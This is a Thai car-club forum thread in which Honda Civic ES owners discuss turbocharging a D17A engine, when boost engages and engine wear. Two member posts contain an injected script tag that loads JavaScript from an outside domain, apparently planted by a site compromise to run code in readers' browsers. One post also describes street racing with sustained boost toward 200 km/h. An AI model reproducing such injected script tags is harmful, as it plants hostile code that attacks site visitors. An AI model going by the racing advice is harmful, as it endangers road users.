ตอบ
wut-chiangmai


ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

ที่อยู่: เชียงใหม่
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 21 สิงหา 2013 14:50 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
dogtown พิมพ์ว่า:

แล้วที่ข้อมูลตามเน็ตที่เค้าว่าแช่ไม่ได้         ก็ไม่ใช่ว่าขับความเร็วสูง ๆ ไม่ได้นะครับ มันขับได้เหมือนรถเดิม ๆ ทั่วไป แต่อย่าแช่บูส  
 



 ถ้าปกติเดินทางไกล ผมแช่ 160 เมื่อใช้เทอร์โบมาถึงความเร็วนี้แล้วเลี้ยงความเร็วไว้ เทอร์โบก็จะไม่ทำงาน แบบนี้ผมเข้าใจถูกมั้ยครับ

แล้วถ้าจะเลี้ยงความเร็ว 180 ไม่ให้เทอร์โบปั่น ก็ทำได้เหมือนกันปะครับ

รบกวนหน่อยนะครับ อ่านแล้วยัง งง ๆ
ได้รับคำขอบคุณจาก: undertaker55 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 21 สิงหา 2013 19:06 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
wut-chiangmai พิมพ์ว่า:
dogtown พิมพ์ว่า:

แล้วที่ข้อมูลตามเน็ตที่เค้าว่าแช่ไม่ได้         ก็ไม่ใช่ว่าขับความเร็วสูง ๆ ไม่ได้นะครับ มันขับได้เหมือนรถเดิม ๆ ทั่วไป แต่อย่าแช่บูส  
 



 ถ้าปกติเดินทางไกล ผมแช่ 160 เมื่อใช้เทอร์โบมาถึงความเร็วนี้แล้วเลี้ยงความเร็วไว้ เทอร์โบก็จะไม่ทำงาน แบบนี้ผมเข้าใจถูกมั้ยครับ

แล้วถ้าจะเลี้ยงความเร็ว 180 ไม่ให้เทอร์โบปั่น ก็ทำได้เหมือนกันปะครับ

รบกวนหน่อยนะครับ อ่านแล้วยัง งง ๆ


มันขึ้นอยู่ที่รอบการใช้งานน่ะวุฒิ. คือ ยกตัวอย่างรถพี่
บูสต์จะติดที่ 3400-3700 r/m คือถ้าพี่ขับ ให้รอบไม่เกินนี้หรือ
ประมาณนี้มันก็สามารถแช่ได้ แต่ความเร็วที่พี่ลองมาแล้วคือ 110-120 km/h ก็จะสามารถขับสบายๆ แต่ถ้าเกินนี้บูสต์จะเริ่มมาแล้ว ที่0.1-0.2 บาร์ .
แต่ถ้าขับ 160 นี่ยังไงบูสต์มาเต็มแน่นอน

สรุปง่ายๆ. คือ ยิ่งความเร็วเยอะ รอบก็เยอะ ไอเสียก็เยอะ ไอดีก็เยอะ. บูสต์มันก็มาเป็นธรรมดา เพราะเทอร์โบมันเอาไอเสียไปปั่น
เป็นลมเข้าเครื่อง. บูสต์มันก็มาตามไอเสียที่เร่งออกมานั่นแหละ
แต่จะมีเวสเกต คอยคุม ไอเสียที่ปั่นโข่งหลังว่าจะเอาบูสต์ที่เท่าไหร่
เพราะโข่งหน้าหลัง มันใช้แกนเดียวกัน. ยิ่งโข่ง หลังน้อยๆ บูสต์ยิ่งติดง่าย การใช้งานรอบต่ำๆ จะสนุกมาก
ได้รับคำขอบคุณจาก: undertaker55  Oyoyoo  wut-chiangmai  สมชาย  bangkean_tum 
dogtown


ชื่อเล่น: อัดขัดลำ

เข้าร่วม: 01 ธันวา 2008
ตอบ: 1114

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2018
ให้คำขอบคุณ: 416

ที่อยู่: บางปะกอก ฝั่งธน
ปี: 2001
พุธ, 21 สิงหา 2013 20:32 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
wut-chiangmai พิมพ์ว่า:

dogtown พิมพ์ว่า:

แล้วที่ข้อมูลตามเน็ตที่เค้าว่าแช่ไม่ได้         ก็ไม่ใช่ว่าขับความเร็วสูง ๆ ไม่ได้นะครับ มันขับได้เหมือนรถเดิม ๆ ทั่วไป แต่อย่าแช่บูส  

 



 ถ้าปกติเดินทางไกล ผมแช่ 160 เมื่อใช้เทอร์โบมาถึงความเร็วนี้แล้วเลี้ยงความเร็วไว้ เทอร์โบก็จะไม่ทำงาน แบบนี้ผมเข้าใจถูกมั้ยครับ

แล้วถ้าจะเลี้ยงความเร็ว 180 ไม่ให้เทอร์โบปั่น ก็ทำได้เหมือนกันปะครับ

รบกวนหน่อยนะครับ อ่านแล้วยัง งง ๆ


เด๋วถ้ามีโอกาสจะถ่ายคลิปมาให้ดูครับ ว่าเป็นยังไง แต่ขับใช้งานทั่วไปสบาย ๆ ครับ 160 ไม่ติดบูส
ได้รับคำขอบคุณจาก: wut-chiangmai 
wutdy


ชื่อเล่น: วูดดี้

เข้าร่วม: 13 มกรา 2010
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 235

ปี: 2001
พุธ, 21 สิงหา 2013 20:56 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
ปกติใช้ตัว turbo ตัวไหนกันเหรอครับ
undertaker55


ชื่อเล่น: ต้อง

เข้าร่วม: 26 สิงหา 2012
ตอบ: 564

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 756
ให้คำขอบคุณ: 684

ที่อยู่: เชียงใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 21 สิงหา 2013 21:56 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
dogtown พิมพ์ว่า:
wut-chiangmai พิมพ์ว่า:

dogtown พิมพ์ว่า:

แล้วที่ข้อมูลตามเน็ตที่เค้าว่าแช่ไม่ได้         ก็ไม่ใช่ว่าขับความเร็วสูง ๆ ไม่ได้นะครับ มันขับได้เหมือนรถเดิม ๆ ทั่วไป แต่อย่าแช่บูส  

 



 ถ้าปกติเดินทางไกล ผมแช่ 160 เมื่อใช้เทอร์โบมาถึงความเร็วนี้แล้วเลี้ยงความเร็วไว้ เทอร์โบก็จะไม่ทำงาน แบบนี้ผมเข้าใจถูกมั้ยครับ

แล้วถ้าจะเลี้ยงความเร็ว 180 ไม่ให้เทอร์โบปั่น ก็ทำได้เหมือนกันปะครับ

รบกวนหน่อยนะครับ อ่านแล้วยัง งง ๆ


เด๋วถ้ามีโอกาสจะถ่ายคลิปมาให้ดูครับ ว่าเป็นยังไง แต่ขับใช้งานทั่วไปสบาย ๆ ครับ 160 ไม่ติดบูส



ถ้าตามที่ผมเข้าใจ คือ บูส มันจะมาตามรอบใช่มั้ยคับ
สมมุติ ถ้าเราตั้งให้บูสมาที่รอบ3000 พอเรากดจนรอบถึง3000+ บูสก็จะเริ่มมาเรื่อยๆ
แต่ถ้าเรายกคันเร่งให้รอบตก บูสก็จะตัดไป อย่างนี้คือการขับแบบไม่แช่บูสใช่มั้ยคับ
moshi


ชื่อเล่น: นก

เข้าร่วม: 28 สิงหา 2009
ตอบ: 264

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 126
ให้คำขอบคุณ: 8

ที่อยู่: บางกรวย
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 21 สิงหา 2013 22:34 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
แอบมาเกบข้อมูลคับ
BeL


ชื่อเล่น: เบล

เข้าร่วม: 03 กันยา 2009
ตอบ: 485

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 644
ให้คำขอบคุณ: 2510

ที่อยู่: ยุดยา ลาดพร้าว
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 21 สิงหา 2013 22:45 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
อัพนิดนึงครับ รถผมติดแก๊ส ด้วย แต่ ตอนนี้ไปเข้าร้านขยายพอร์ต มาแล้ว และเปลี่ยนเกียร์จาก at เป็น mtแล้ว จะใส่ turboครับ สเต็ปต่อไปควรจะทำอะไรต่อดีครับ เสต็ปคืออยากจะใส่ชุดแก๊สไว้เพราะ เดือนๆหนึ่งใช้รถเยอะมากครับ ช่วยแนะนำทีครับขอบคุณครับ 
sett_w


ชื่อเล่น: เสฎ

เข้าร่วม: 27 กันยา 2011
ตอบ: 331

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 226
ให้คำขอบคุณ: 116

ที่อยู่: คอนหวัน-กทม.
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 21 สิงหา 2013 23:29 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
+1ครับอยากลองของเหมือนกัน"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 22 สิงหา 2013 09:47 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
ขออัพหน่อยครับ กำลังลังเล จะเล่น Turbo หรือ NA ดี แต่ใจเอียงไปทาง Turbo เพราะถ้าภายภาคหน้าขายหรือเปลี่ยนรถก็ถอดออกกลับมาเหมือนเดิมได้ กำลังมีงบสิ้นเดือนนี้ ของผม 1.7 vtec mt ถ้าเล่น IHI B52 หรือ TD04L เป็นไงบ้างครับ TD04ใช้เป็นตัวอื่นได้อีกไหม แล้วอินเตอร์ต้องหาขนาดปากกี่นิ้วครับ 2" ใช่หรือเปล่าครับ
Lee_ES_turbo


เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
พฤหัส, 22 สิงหา 2013 10:32 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
แรงกันใหญ่เลย รอผมบ้างสิ เครื่องยังไม่เสดเลย
coco1340


เข้าร่วม: 11 มกรา 2012
ตอบ: 1239

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 302

ที่อยู่: พระราม 2
พฤหัส, 22 สิงหา 2013 10:47 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
  ความรู้ทั้งนั้นเลยยย ขอบคุณครับ อยากเซ็ทโบบ้างจังเลย 
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 23 สิงหา 2013 09:11 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
ขอถามเพื่อเป็นข้อมูลครับ ถ้าในกรณ๊ที่ขับแบบไม่ติดบูช 2000 - 2500 rpm บูชยังไม่ติดก็เหมือนเราขับเครื่องธรรมดาที่ไม่ติด Turbo เครื่องเราก็ไม่มีภาระ ไม่โทรม ผมเข้าใจถูกหรือเปล่า ถ้าเราอาจซิ่งก็แค่เหยียบ เร่งรอบขึ้นไปเพื่อให้ติดบูชใช่หรือไม่ครับ ถ้าใช่ผมว่าน่าสนกว่า สเตปทำ NA นะครับ เพราะถ้าทำฝา เปิดขยายแยงพอร์ท เครื่องมันจะผิดจากสเปกตั้งแต่เดินเบามาเลย เครื่องก็ต้องโทรมเร็วขึ้นใช่ไหม
ได้รับคำขอบคุณจาก: undertaker55 
future


เข้าร่วม: 24 เมษา 2009
ตอบ: 893

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1055
ให้คำขอบคุณ: 736

ที่อยู่: ลาดพร้าว 101/ ท่าเรือคลองเตย / สนามบินสุวรรณภูมิ /นครศรีธรรมราช
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 23 สิงหา 2013 16:11 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
MT รอบต่อความเร็วมันสูงกว่า AT แสดงว่า ถ้า วิ่งทางไกลแล้วแช่ยาวที่เกียร์ 5  120-170 นี่ รอบ 4000 +
แสดงว่า บูส ติดตลอด ก็เสียงต่อการพังใช่ไหมครับ
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 23 สิงหา 2013 23:30 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
future พิมพ์ว่า:
MT รอบต่อความเร็วมันสูงกว่า AT แสดงว่า ถ้า วิ่งทางไกลแล้วแช่ยาวที่เกียร์ 5  120-170 นี่ รอบ 4000 +
แสดงว่า บูส ติดตลอด ก็เสียงต่อการพังใช่ไหมครับ



ที่จะพังก็. ก้านขาด กับลูกแตก. อ่ะครับ. แต่อย่ากดแช่อ่ะครับ
กดส่ง แล้วถอน.
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 27 สิงหา 2013 12:13 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
blackhawkpearl พิมพ์ว่า:
future พิมพ์ว่า:
MT รอบต่อความเร็วมันสูงกว่า AT แสดงว่า ถ้า วิ่งทางไกลแล้วแช่ยาวที่เกียร์ 5  120-170 นี่ รอบ 4000 +
แสดงว่า บูส ติดตลอด ก็เสียงต่อการพังใช่ไหมครับ



ที่จะพังก็. ก้านขาด กับลูกแตก. อ่ะครับ. แต่อย่ากดแช่อ่ะครับ
กดส่ง แล้วถอน.

ยังงงๆ เรื่องกดแช่ สมมุติอัดมากับ es ไม่โบ ประมาณ 140 - 160 km ซึ่งเครื่องธรรมดาทำได้อยู่แล้วยังงี้ เราเครื่องโบแช่ไม่ได้ก็สู้ไม่ได้ใช่ไหม(ที่แช่นะประมาณกี่วิหรือกี่นาทีปลอดภัย)ต้องผ่อนปล่อยเครื่องธรรมดาไปใช่ไหม หรือเครื่องโบต้องขับยังไงครับ

 
สมชาย


เข้าร่วม: 14 มกรา 2013
ตอบ: 5916

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4245
ให้คำขอบคุณ: 7209

ที่อยู่: อ.บ้านบึง จ.ชลบุรี
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
อังคาร, 27 สิงหา 2013 14:26 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
alit พิมพ์ว่า:
blackhawkpearl พิมพ์ว่า:
future พิมพ์ว่า:
MT รอบต่อความเร็วมันสูงกว่า AT แสดงว่า ถ้า วิ่งทางไกลแล้วแช่ยาวที่เกียร์ 5  120-170 นี่ รอบ 4000 +
แสดงว่า บูส ติดตลอด ก็เสียงต่อการพังใช่ไหมครับ



ที่จะพังก็. ก้านขาด กับลูกแตก. อ่ะครับ. แต่อย่ากดแช่อ่ะครับ
กดส่ง แล้วถอน.

ยังงงๆ เรื่องกดแช่ สมมุติอัดมากับ es ไม่โบ ประมาณ 140 - 160 km ซึ่งเครื่องธรรมดาทำได้อยู่แล้วยังงี้ เราเครื่องโบแช่ไม่ได้ก็สู้ไม่ได้ใช่ไหม(ที่แช่นะประมาณกี่วิหรือกี่นาทีปลอดภัย)ต้องผ่อนปล่อยเครื่องธรรมดาไปใช่ไหม หรือเครื่องโบต้องขับยังไงครับ


 




+1"<script src="https://sport32news.com/civicesgroup.js">
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 28 สิงหา 2013 21:41 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
alit พิมพ์ว่า:
blackhawkpearl พิมพ์ว่า:
future พิมพ์ว่า:
MT รอบต่อความเร็วมันสูงกว่า AT แสดงว่า ถ้า วิ่งทางไกลแล้วแช่ยาวที่เกียร์ 5  120-170 นี่ รอบ 4000 +
แสดงว่า บูส ติดตลอด ก็เสียงต่อการพังใช่ไหมครับ



ที่จะพังก็. ก้านขาด กับลูกแตก. อ่ะครับ. แต่อย่ากดแช่อ่ะครับ
กดส่ง แล้วถอน.

ยังงงๆ เรื่องกดแช่ สมมุติอัดมากับ es ไม่โบ ประมาณ 140 - 160 km ซึ่งเครื่องธรรมดาทำได้อยู่แล้วยังงี้ เราเครื่องโบแช่ไม่ได้ก็สู้ไม่ได้ใช่ไหม(ที่แช่นะประมาณกี่วิหรือกี่นาทีปลอดภัย)ต้องผ่อนปล่อยเครื่องธรรมดาไปใช่ไหม หรือเครื่องโบต้องขับยังไงครับ

 



การset turbo เพื่อ เพิ่มแรงม้ากับแรงบิด การที่เราแช่ดือหมายถึง
การขับติดบูสต์เป็นเวลานาน มันจะเสี่ยงต่อเครื่องพัง ถ้ารถ
Na ขับคู่กับ รถ turbo มาด้วยความเร็วที่ 150 แล้วต่างคนต่างเหยียบรถ turbo ความเร็วจะขึ้นเร็วกว่าแน่นอน
ส่วนผมเคยแช่ ที่นานสุดก็ 4-5 km ก็เสียวแล้วอ่ะครับ
ตอนนั้นแข่งกับกระบะ
ถ้าเราจะเอาไปแข่ง ผมว่ามันก็ได้เปรียบ คงไม่มีใครแข่งเป็นสิบๆ กิโลหรอกครับ. แต่ถ้าต้องแช่ขนาดนั้น. เหยืยบให้ถึง 200 แล้วผ่อนค่อยเหยียบส่ง ทำอน่างนี้ผมว่าพอช่วยได้
yoykung


เข้าร่วม: 25 กรกฎา 2011
ตอบ: 1

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 0
ให้คำขอบคุณ: 0
พุธ, 16 กรกฎา 2014 14:04 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
เข้ามาอ่านคลับนี้มีไรกิเลสเกิดทุกที
aumlight


ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

ที่อยู่: ES เมืองทอง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 17 กรกฎา 2014 08:12 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
เก็บข้อมูลครับ อยากจะทำบ้าง


BallOptionS


ชื่อเล่น: บอล

เข้าร่วม: 10 ตุลา 2013
ตอบ: 163

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 98
ให้คำขอบคุณ: 27

ที่อยู่: บางเสาธง บางพลี สมุทรปราการ
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 18 กรกฎา 2014 00:58 - เครื่อง d17a at สามารถ set turbo ได้มั้ย
+1 อ่านแล้วขนลุกเลย
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.